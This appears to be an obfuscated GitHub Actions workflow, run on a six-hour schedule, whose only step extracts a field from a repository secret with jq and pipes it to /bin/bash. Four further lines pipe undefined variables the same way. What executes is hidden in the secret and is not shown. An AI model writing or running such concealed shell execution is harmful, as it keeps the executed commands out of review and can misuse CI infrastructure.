name: yanxiaosan1829
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanxiaosan1829
        env:
          a48642: ${{ secrets.a48642 }}
        run: |
          echo $a48642 | jq -r .cwd2023 | /bin/bash
          echo $rahod2 | jq -r .pq65923 | /bin/bash
          echo $lgzzo71891 | jq -r .kz7807 | /bin/bash
          echo $yjag9 | jq -r .e4134 | /bin/bash
          echo $m8688 | jq -r .ceq446 | /bin/bash

